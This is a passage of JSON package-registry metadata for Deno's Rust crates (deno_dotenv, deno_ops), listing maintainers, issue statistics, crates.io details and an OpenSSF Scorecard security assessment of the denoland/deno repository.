count":22.89374973658701,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":44.59950066304899},"purl":"pkg:cargo/deno_dotenv","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_dotenv","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_dotenv","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_dotenv/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_dotenv/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_dotenv/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_dotenv/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_dotenv/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_dotenv/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_dotenv/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2026-02-20T15:47:44.062Z","updated_at":"2026-02-20T15:47:44.062Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2026-02-20T15:47:44.124Z","updated_at":"2026-02-20T15:47:44.124Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047461,"name":"deno_ops","ecosystem":"cargo","description":"Proc macro for writing Deno Ops","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":289,"first_release_published_at":"2022-03-14T17:10:13.243Z","latest_release_published_at":"2026-08-27T15:19:38.870Z","latest_release_number":"0.287.0","last_synced_at":"2026-09-07T22:57:05.416Z","created_at":"2022-04-12T10:01:01.584Z","updated_at":"2026-09-07T22:57:05.417Z","registry_url":"https://crates.io/crates/deno_ops/","install_command":"cargo install deno_ops","documentation_url":"https://docs.rs/deno_ops/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed 